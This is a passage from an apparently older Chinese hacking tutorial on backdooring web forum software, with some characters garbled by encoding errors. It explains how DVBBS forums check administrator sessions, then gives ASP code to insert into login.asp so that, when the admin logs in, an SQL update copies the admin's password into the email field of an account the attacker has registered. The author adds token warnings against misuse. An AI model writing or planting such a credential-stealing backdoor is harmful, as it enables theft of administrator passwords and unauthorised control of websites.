圖三

　　呵呵，別做壞事哦............

　　小結(jié)一下：我們先找到弄到管理員賬號(hào)，然后找到它的驗(yàn)證頁(yè)面，根據(jù)它的驗(yàn)證內(nèi)容來(lái)寫(xiě)入我們要的后門(mén)。不同的系統(tǒng)有不同的驗(yàn)證方式，比如青創(chuàng)文章系統(tǒng)它不但要驗(yàn)證你的用戶名還要驗(yàn)證等級(jí)，但是我們總體思路還是一樣，就是他驗(yàn)證什么我們就加入什么。

　　密碼竊探篇

　　可以說(shuō)上述方法在動(dòng)網(wǎng)論壇或者其他論壇面前是蒼白無(wú)力的，因?yàn)橐话阏搲�由于交互性較強(qiáng)，所以在驗(yàn)證上考慮了很多。以動(dòng)網(wǎng)為例，你要登錄后臺(tái)，他先驗(yàn)證你有沒(méi)有先登錄了前臺(tái)，沒(méi)有的話就給你返回一個(gè)錯(cuò)誤頁(yè)面。你登錄前臺(tái)后系統(tǒng)會(huì)給你一個(gè)seession來(lái)記錄你的CacheName和你的ID，然后在你登錄后臺(tái)的時(shí)候拿出來(lái)比較你前后臺(tái)身份是否一致，一直就通過(guò)，否則kill，面對(duì)這樣嚴(yán)格的驗(yàn)證，難道我們就沒(méi)有辦法基后臺(tái)了嗎？對(duì)，沒(méi)有了（誰(shuí)拿雞蛋扔我？這么浪費(fèi)。），但是我們可以想新的辦法，既然驗(yàn)證這么嚴(yán)格，那么我如果拿著密碼光明正大的進(jìn)去呢？因此，這里一個(gè)新的思路就是拿到它的明文密碼。什么時(shí)候有明文密碼呢？對(duì)了，就在管理員登錄的時(shí)候。好，我們就在那里做手腳，把它登錄的密碼發(fā)給我們，然后我們拿和它的密碼去登錄。呵呵，是不是很像sniffer��？在下在前幾個(gè)月剛和好兄弟潛龍?jiān)谝袄�用硬件sniffer配合省網(wǎng)安局的人端掉一個(gè)非法電影網(wǎng)站，足足4000G的硬盤(pán)，幾十臺(tái)服務(wù)器，一個(gè)字：爽

　　好了，我們開(kāi)始修改它的程序。編輯login.asp，加入以下幾句話：

　　if not isnull(trim(request("username"))) then

　　if request("username")="admin" then

　　sql="update [Dv_Vser] set UserEmail=(select userpassword from

　　[Dv_User]

　　where username='"& request("username")&"') where

　　UserName='aweige'"

　　conn.execute(sql)

　　end if

　　end if　　

　　這幾句話的意思就是說(shuō)如果admin（假設(shè)的，實(shí)際操作中改為你要的管理員名字）登錄成功就更新數(shù)據(jù)庫(kù)，把他的密碼放到我資料的E-mail中。當(dāng)然，你必須先在論壇里注冊(cè)一個(gè)用戶名。結(jié)果如圖四：

　　圖四

　　還有，如果是動(dòng)網(wǎng)7.0以下的默認(rèn)數(shù)據(jù)庫(kù)admin表名和7.0以上有點(diǎn)不一樣，所以實(shí)際操作中不可生搬硬套。


　　后記：

　　對(duì)于以上兩種方法直到目前為止我還想不出任何比較有效的解決方法，因?yàn)槟愕木W(wǎng)站被人家放了馬，你根本就沒(méi)辦法去阻止人家去插入，要是誰(shuí)有好的解決方法記得告訴我。

　　另外，希望大家不要去搞破壞，那時(shí)我真的不愿看到的，也祝所有的網(wǎng)管們好運(yùn)，希望你們不會(huì)碰上craker們。